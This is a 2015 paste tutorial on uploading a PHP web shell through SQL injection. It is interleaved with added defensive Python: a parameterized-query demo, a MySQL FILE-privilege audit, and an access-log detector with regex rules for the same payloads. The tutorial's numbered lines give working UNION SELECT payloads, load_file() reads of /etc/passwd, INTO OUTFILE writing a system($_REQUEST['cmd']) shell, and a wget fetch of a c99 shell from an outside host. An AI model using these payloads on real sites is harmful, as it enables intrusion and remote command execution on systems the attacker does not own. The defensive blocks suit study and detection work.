Kyfx

HOW TO UPLOAD SHELL THROUGH SQL INJECTION

Mar 13th, 2015
First of all, find a website which is vulnerable to SQL injection. You can find websites by dorks or manually XD, like I have found this one.
You need 2 main things:
1) Root path of the website
2) A writable directory
If the vulnerable website doesn't show the root path then don't worry, I will tell you how to find the root path. :D
And also the writable directory.

www.site.com/index.php?id=10'


I am not starting with the ABC of SQLi, hope you know the basics :D
Now we have to find the columns of the website, then the vulnerable columns. Like my site has 5 columns and 3 is the vulnerable column.

www.site.com/index.php?id=-10 UniOn SeleCt 1,2,3,4,5--

www.site.com/index.php?id=-10 UniOn SeleCt 1,2,version(),4,5--
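The reason the UNION payload above returns its own values in the page's third column is that the id parameter is concatenated into the SQL text. The following is an added example for this page (not the original author's code) that puts the vulnerable lookup beside the parameterized one. It uses an in-memory SQLite database as a stand-in for the MySQL-backed index.php; the table, columns and rows are constructed, and sqlite_version() replaces version() because SQLite has no version() function.

```python
"""Why the UNION payload above works and why parameter binding stops it.

Added example for this page, not the original author's code. An in-memory
SQLite database stands in for the MySQL-backed index.php (table name, columns
and rows are constructed); SQLite has no version(), so sqlite_version() takes
its place in the payload. Everything else mirrors the page's query.
"""
import sqlite3

COLUMNS = "id, title, body, author, views"  # five columns, as on the page's site

# The page's column-enumeration payload, with SQLite's spelling of version().
PAYLOAD = "-10 UNION SELECT 1,2,sqlite_version(),4,5--"


def make_db():
    """Constructed sample data: an articles table with five columns."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE articles (id INTEGER, title TEXT, body TEXT, author TEXT, views INTEGER)"
    )
    conn.executemany(
        "INSERT INTO articles VALUES (?, ?, ?, ?, ?)",
        [(10, "Hello", "First post", "admin", 3), (11, "News", "Second post", "editor", 7)],
    )
    return conn


def vulnerable_lookup(conn, user_id):
    """The flaw: the id parameter is pasted into the SQL text, so its
    UNION SELECT becomes part of the statement and its output lands in
    the page's third column, exactly as the tutorial describes."""
    return conn.execute(f"SELECT {COLUMNS} FROM articles WHERE id={user_id}").fetchall()


def bound_lookup(conn, user_id):
    """The fix: the value is bound as a parameter. The driver sends it as
    data, the database never parses it as SQL, and a non-numeric string
    simply matches no integer id."""
    return conn.execute(f"SELECT {COLUMNS} FROM articles WHERE id=?", (user_id,)).fetchall()


def validated_lookup(conn, user_id):
    """Defence in depth: reject anything that is not an integer before the
    query runs (a real handler would answer 400), then bind it."""
    try:
        id_value = int(user_id)
    except (TypeError, ValueError):
        return []
    return bound_lookup(conn, id_value)


def demo():
    """Run the page's payload through all three handlers and return the rows."""
    conn = make_db()
    return {
        "vulnerable": vulnerable_lookup(conn, PAYLOAD),
        "bound": bound_lookup(conn, PAYLOAD),
        "validated": validated_lookup(conn, PAYLOAD),
        "normal_bound": bound_lookup(conn, "10"),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name:>12}: {rows}")
```

The vulnerable handler returns a single row whose third field is the database version, which is the behaviour the tutorial relies on; the bound handler returns nothing for the same input because the whole string is compared against the integer id as data, and the validated handler never reaches the database at all.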
  17.  
  18. Let's Try To Load Files Of The Website
  19.  
  20. www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('/etc/passwd'),4,5--
  21. www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('/etc/my.cnf'),4,5--
  22. www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('/etc/group'),4,5--
  23. www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('/etc/services'),4,5--
  24. www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('/etc/hosts'),4,5--
  25.  
  26. We Won't Need To Read Any Files Mentioned above just to increase your knowledge :D
  27. Now we have to checked the file privilage for the current user for this first you have to find current username.
  28. Like This
  29.  
  30. www.site.com/index.php?id=-10 UniOn SeleCt 1,2,current_user,4,5--
  31.  
  32. Our Current Username is etc mine is Ch3rn0by1
  33. Now Check File Privilages for User Ch3rn0by1
  34.  
  35. www.site.com/index.php?id=-10 UniOn SeleCt 1,2,file_priv,4,5 FROM mysql.user WHERE user='Ch3rn0by1'--
  36.  
  37. If it shows Y (yes) on the vulnerable column of the website that means we have the file privilages for the current user Ch3rn0by1
  38. And if it is'nt shows Y than Dont waste your time there :D
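The file_priv check above is exactly the question a defender should ask of their own server, together with the secure_file_priv setting that decides whether load_file() and INTO OUTFILE can touch arbitrary paths at all. The following is an added example (not part of the original paste) that audits both from a my.cnf fragment and from rows in the shape of SELECT user, host, File_priv FROM mysql.user. The config text and the account rows are constructed sample input; the weak configuration is shown beside the corrected one.

```python
"""Audit the two MySQL settings the file_priv check above depends on.

Added example, not part of the original paste. It reads a my.cnf fragment and
rows shaped like `SELECT user, host, File_priv FROM mysql.user`, then reports
whether load_file()/INTO OUTFILE are usable and by which accounts. The config
text and the account rows below are constructed sample input.
"""
import configparser
from dataclasses import dataclass

# Constructed my.cnf: the weak setting (empty secure_file_priv) beside the
# corrected one a defender would deploy.
WEAK_CNF = """
[mysqld]
datadir = /var/lib/mysql
secure_file_priv =
"""

HARDENED_CNF = """
[mysqld]
datadir = /var/lib/mysql
secure-file-priv = /var/lib/mysql-files
"""

# Constructed output of: SELECT user, host, File_priv FROM mysql.user;
ACCOUNTS = [
    ("root", "localhost", "Y"),
    ("webapp", "%", "Y"),        # application account with FILE: the page's scenario
    ("readonly", "localhost", "N"),
]


@dataclass
class Finding:
    severity: str
    message: str
    fix: str = ""


def secure_file_priv_state(cnf_text):
    """Return (state, value) for secure_file_priv in the [mysqld] section.

    MySQL accepts dashes or underscores in option names, so both spellings are
    recognised. States: 'unset', 'unrestricted' (empty string), 'disabled'
    (NULL) and 'restricted' (a directory path).
    """
    parser = configparser.ConfigParser(allow_no_value=True, interpolation=None)
    parser.read_string(cnf_text)
    if not parser.has_section("mysqld"):
        return "unset", None
    section = parser["mysqld"]
    for key in ("secure_file_priv", "secure-file-priv"):
        if key in section:
            value = (section[key] or "").strip().strip('"').strip("'")
            if value == "":
                return "unrestricted", value
            if value.upper() == "NULL":
                return "disabled", value
            return "restricted", value
    return "unset", None


def audit(cnf_text, accounts):
    """Combine the server-wide setting with the per-account FILE grants."""
    findings = []
    state, value = secure_file_priv_state(cnf_text)
    if state == "unrestricted":
        findings.append(Finding("high",
            "secure_file_priv is empty: FILE-privileged accounts can read and write "
            "any path the mysqld process can reach",
            "set secure_file_priv to a dedicated directory, or to NULL to disable file import/export"))
    elif state == "unset":
        findings.append(Finding("high",
            "secure_file_priv is not set; servers before 5.7.6 default to empty (no restriction)",
            "set secure_file_priv explicitly to a dedicated directory or NULL"))
    elif state == "disabled":
        findings.append(Finding("info", "secure_file_priv=NULL: load_file() and INTO OUTFILE are disabled"))
    else:
        findings.append(Finding("info", f"secure_file_priv restricts file operations to {value}"))

    for user, host, file_priv in accounts:
        if file_priv != "Y":
            continue
        # root@localhost holds FILE by default; any other holder, and any
        # holder reachable from '%' hosts, is a web-application-to-filesystem bridge.
        severity = "info" if (user == "root" and host == "localhost") else "high"
        findings.append(Finding(severity, f"{user}@{host} holds the global FILE privilege",
                                f"REVOKE FILE ON *.* FROM '{user}'@'{host}';"))
    return findings


if __name__ == "__main__":
    for f in audit(WEAK_CNF, ACCOUNTS):
        print(f"[{f.severity}] {f.message}" + (f"  -> {f.fix}" if f.fix else ""))
```

Run against the weak configuration the audit flags both the empty secure_file_priv and the application account holding FILE, and prints the REVOKE statement for the latter; against the hardened configuration with only root@localhost left holding FILE it reports informational findings only.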
  39.  
  40. Ok Now we have to know the root path :D for this we have to know the software which is used in the server
  41. you can use havij and etc/passwd and many more softwares etc/passwd is'nt a software LOL
  42. To know the server software by file etc/passwd use this query
  43.  
  44. www.site.com/index.php?id=-10 UniOn SeleCt 1,2,3,load_file('etc/passwd'),5--
  45.  
  46. now we have our server software etc (/home/Ch3rn0by1)
  47. now read one more file.
  48.  
  49. www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('etc/Ch3rn0by1.conf')4,5--
  50.  
  51. Where Ch3rn0by1 is your server software name like server name.conf :D
  52.  
  53. now we have the root path
  54.  
  55. /home/site.com/public_html etc.
  56.  
  57. Now we have to find a writeable directory for this you can use google dorks as well and your knowledge too :D
  58.  
  59. site www.site.com/dir/*/*/*/*/
  60.  
  61. so its site.com/ch3rn0by1/writeable
  62.  
  63. now we will upload our evil code
  64.  
  65. www.site.com/index.php?id=10 UniOn SeleCt 1,2,"<?system($_REQUEST['cmd']);?>",4,5 into outfile '/home/site/public_html/Ch3rn0by1/writeable directory/Ch3rn0by1.php'--+
  66. ok now we have to execute our commands
  67. www.site.com/Ch3rn0by1/writeable directory/Ch3rn0by1.php?cmd=pwd
  68. www.site.com/Ch3rn0by1/writeable directory/Ch3rn0by1.php?cmd=uname -a
  69.  
  70. Now we will use wget command to upload our evil script
  71.  
  72. www.site.com/Ch3rn0by1/writeable directory/Ch3rn0by1.php?cmd=wget http://www.shellsite.com/c99.txt
  73.  
  74. Now we will rename our c99.txt to php in order to execute it :D
  75.  
  76. www.site.com/Ch3rn0by1/writeable directory/Ch3rn0by1.php?cmd=mv c99.txt c99.php
  77.  
  78. now open it
  79.  
  80. www.site.com/Ch3rn0by1/writeable directory/c99.php VOILA OUR SHELL GOT LIVE :D
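Every step of the chain above leaves a request in the web server's access log: the quote probe, the mixed-case UNION SELECT, load_file(), the read of mysql.user, INTO OUTFILE carrying a PHP tag, and finally cmd= parameters sent to a file that did not exist a minute earlier. The following is an added example (not part of the original paste) that scans combined-format access log lines for those indicators after URL-decoding and normalising them, and groups hits per client so the full progression from one address is visible. The log lines are constructed sample input: the client addresses are RFC 5737 documentation addresses and example.invalid stands in for the download host.

```python
"""Detect the request chain described above in web-server access logs.

Added example, not part of the original paste. It scans Apache/nginx combined
log lines for the URL patterns this write-up uses: UNION SELECT with mixed
case, load_file(), INTO OUTFILE, reads of mysql.user, an injected PHP tag,
and command strings sent to a dropped PHP file. Log lines are constructed
sample input (RFC 5737 addresses, example.invalid as the download host).
"""
import re
from urllib.parse import unquote_plus

SAMPLE_LOG = r'''
203.0.113.7 - - [13/Mar/2015:10:01:02 +0000] "GET /index.php?id=10 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [13/Mar/2015:10:01:09 +0000] "GET /index.php?id=10' HTTP/1.1" 500 312 "-" "Mozilla/5.0"
203.0.113.7 - - [13/Mar/2015:10:01:31 +0000] "GET /index.php?id=-10%20UniOn%20SeleCt%201,2,version(),4,5-- HTTP/1.1" 200 4981 "-" "Mozilla/5.0"
203.0.113.7 - - [13/Mar/2015:10:02:05 +0000] "GET /index.php?id=-10%20UniOn%20SeleCt%201,2,load_file('/etc/passwd'),4,5-- HTTP/1.1" 200 6020 "-" "Mozilla/5.0"
203.0.113.7 - - [13/Mar/2015:10:02:40 +0000] "GET /index.php?id=-10%20UniOn%20SeleCt%201,2,file_priv,4,5%20FROM%20mysql.user%20WHERE%20user='Ch3rn0by1'-- HTTP/1.1" 200 4990 "-" "Mozilla/5.0"
203.0.113.7 - - [13/Mar/2015:10:03:12 +0000] "GET /index.php?id=10%20UniOn%20SeleCt%201,2,%22%3C?system($_REQUEST['cmd']);?%3E%22,4,5%20into%20outfile%20'/home/site/public_html/up/x.php'--+ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [13/Mar/2015:10:03:20 +0000] "GET /up/x.php?cmd=uname%20-a HTTP/1.1" 200 88 "-" "Mozilla/5.0"
203.0.113.7 - - [13/Mar/2015:10:03:44 +0000] "GET /up/x.php?cmd=wget%20http://example.invalid/c99.txt HTTP/1.1" 200 210 "-" "Mozilla/5.0"
198.51.100.9 - - [13/Mar/2015:10:04:00 +0000] "GET /index.php?id=11 HTTP/1.1" 200 5100 "-" "Mozilla/5.0"
'''

# Combined log format: client, identity, user, [timestamp] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Rules run on the decoded, lower-cased, whitespace-collapsed request target.
RULES = [
    ("sqli-union-select", re.compile(r"\bunion\b\s+(?:all\s+)?\bselect\b")),
    ("sqli-load_file", re.compile(r"\bload_file\s*\(")),
    ("sqli-into-outfile", re.compile(r"\binto\s+(?:out|dump)file\b")),
    ("sqli-mysql-user-read", re.compile(r"\bfrom\s+mysql\.user\b")),
    ("sqli-quote-probe", re.compile(r"[?&]\w+=\d+'$")),            # low confidence on its own
    ("php-injected-tag", re.compile(r"<\?(?:php)?\s*(?:system|exec|passthru|shell_exec)\s*\(")),
    ("webshell-cmd-param", re.compile(r"[?&]cmd=(?:wget|curl|uname|id|whoami|mv|pwd|ls|cat)\b")),
]


def normalize(target):
    """URL-decode repeatedly (defeats double encoding), fold case and whitespace."""
    decoded = target
    for _ in range(3):
        nxt = unquote_plus(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    return re.sub(r"\s+", " ", decoded).lower()


def scan_line(line):
    """Return a finding dict for one log line, or None if nothing matched."""
    m = LOG_RE.match(line)
    if not m:
        return None
    norm = normalize(m["target"])
    hits = [name for name, rx in RULES if rx.search(norm)]
    if not hits:
        return None
    return {"ip": m["ip"], "time": m["ts"], "status": m["status"],
            "target": m["target"], "rules": hits}


def scan_log(text):
    return [f for f in (scan_line(line) for line in text.splitlines()) if f]


def chain_by_ip(findings):
    """Distinct rules seen per client: one address moving from probes through
    INTO OUTFILE to cmd= requests is the whole chain from this write-up."""
    chains = {}
    for f in findings:
        chains.setdefault(f["ip"], set()).update(f["rules"])
    return chains


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for f in found:
        print(f'{f["time"]} {f["ip"]} {f["status"]} {",".join(f["rules"])}  {f["target"]}')
    for ip, rules in chain_by_ip(found).items():
        print(f"{ip}: {len(rules)} distinct indicators")
```

On the sample input the scanner flags seven of the nine lines and attributes all seven indicator types to the single client address, while the ordinary id=11 request from the second address produces nothing. The quote-probe rule is deliberately weak on its own and earns its place only as the first step of a per-client sequence; a 200 response to an INTO OUTFILE request followed by the first-ever hit on a new .php path is the point at which the chain should page someone, and it is also the moment to check the MySQL FILE grants and secure_file_priv setting the tutorial relies on.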

Credits to Pak Cyber World <--- Thank you, I always support the work you do.